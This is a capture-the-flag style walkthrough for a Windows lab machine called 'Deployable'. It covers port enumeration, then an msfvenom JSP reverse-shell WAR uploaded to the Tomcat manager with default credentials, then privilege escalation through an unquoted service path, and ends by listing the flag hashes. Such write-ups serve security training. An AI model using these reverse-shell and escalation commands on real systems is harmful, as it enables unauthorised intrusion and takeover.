Info

  • Name – Deployable
  • IP Address – 172.31.1.13

Enumeration

Open Ports

PortProtocolServiceVersion
135 tcp msrpcMicrosoft Windows RPC
137udpnetbios-nsMicrosoft Windows netbios-ns
138 udp filterednetbios-dgm
139 tcp netbios-ssnMicrosoft Windows netbios-ssn
445 tcp microsoft-dsMicrosoft Windows Server 2008 R2 – 2012 microsoft-ds
500 udp filteredisakmp
3389 tcp ms-wbt-server
4500 udp filterednat-t-ike
5985 tcp httpMicrosoft HTTPAPI httpd 2.0
8009 tcp ajp13Apache Jserv
8080 tcp httpApache Tomcat/Coyote JSP engine 1.1
47001 tcp httpMicrosoft HTTPAPI httpd 2.0
49152 tcp msrpcMicrosoft Windows RPC
49153 tcp msrpcMicrosoft Windows RPC
49154 tcp msrpcMicrosoft Windows RPC
49155 tcp msrpcMicrosoft Windows RPC
49156 tcp msrpcMicrosoft Windows RPC
49163 tcp msrpcMicrosoft Windows RPC
49164 tcp msrpcMicrosoft Windows RPC

Exploitation

Exploit Details (File Upload)

  • Name – File Upload
  • CVE – N/A
  • Module – N/A
  • Disclosed – N/A
  • References
    • N/A

Create a war file payload using msfvenom

msfvenom -p java/jsp_shell_reverse_tcp LHOST=$lhost LPORT=$lport -f war > shell.war

Login to the http://172.31.1.13:8080/manager/html application using the default credentials (tomcat / s3cret) and upload the payload. Then click on Deploy.

In the Applications menu click on the new ‘/shell’ application.

Catch the reverse shell and read the access.txt file.

whoami
type C:\Users\tomcat\Desktop\access.txt

Privilege Escalation

Exploit Details (Unquoted Service path)

  • Name – Unquoted service path
  • CVE – N/A
  • Module – N/A
  • Disclosed – N/A
  • References
    • N/A

The Deploy service contains an unquoted service path and the user account has write permissions into the C:\Program Files\Deploy Ready\ folder.

copy shell.exe "C:\Program Files\Deploy Ready\Service.exe"
net stop Deploy
net start Deploy
whoami
type C:\Users\Administrator\Desktop\system.txt

Loot

access.txt - 5b7dbd2f4ce39bb536fe1da6c897a4fb
system.txt - 11400db5d23b9738534002f27b86c030